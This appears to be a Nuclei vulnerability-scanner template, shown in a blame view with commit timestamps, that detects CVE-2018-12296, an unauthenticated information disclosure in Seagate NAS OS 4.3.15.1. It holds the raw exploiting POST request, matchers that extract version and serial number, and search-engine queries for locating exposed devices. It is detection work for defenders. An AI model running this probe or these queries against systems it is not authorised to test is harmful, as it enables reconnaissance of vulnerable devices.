2022-03-14 10:28:20 +00:00
id : CVE-2018-12296
2022-04-22 10:38:41 +00:00
2022-03-14 10:28:20 +00:00
info :
2022-03-14 12:16:34 +00:00
name : Seagate NAS OS 4.3.15.1 - Server Information Disclosure
2022-03-14 10:28:20 +00:00
author : princechaddha
severity : high
2022-07-05 18:13:40 +00:00
description : Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can gain sensitive information about the server, potentially leading to further attacks.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade to a patched version of Seagate NAS OS.
2022-03-14 10:28:20 +00:00
reference :
- https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
- https://nvd.nist.gov/vuln/detail/CVE-2018-12296
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-03-14 19:05:47 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2022-03-14 19:05:47 +00:00
cve-id : CVE-2018-12296
cwe-id : CWE-732
2024-03-23 09:28:19 +00:00
epss-score : 0.01442
2024-06-07 10:04:29 +00:00
epss-percentile : 0.866
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : seagate
product : nas_os
2024-05-31 19:23:20 +00:00
shodan-query : http.title:"seagate nas - seagate"
fofa-query : title="seagate nas - seagate"
google-query : intitle:"seagate nas - seagate"
2023-07-11 19:49:27 +00:00
tags : cve,cve2018,seagate,nasos,disclosure,unauth
2022-03-14 10:28:20 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-03-14 10:28:20 +00:00
- raw :
- |
POST /api/external/7.0/system.System.get_infos HTTP/1.1
Host : {{Hostname}}
Referer : {{BaseURL}}
matchers :
- type : word
part : body
words :
- '"version":'
- '"serial_number":'
condition : and
extractors :
- type : regex
group : 1
regex :
- '"version": "([0-9.]+)"'
2023-07-11 19:49:27 +00:00
part : body
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022100c86c7844f9443c6b8d293926410ce41785db4ef5c6b98043f30213d9bbb9270a022070c2af8ad6d2d241e8f1fef3587bcf19840745117be2ff717086e32217b3849f:922c64590222798bb761d5b6d8e72950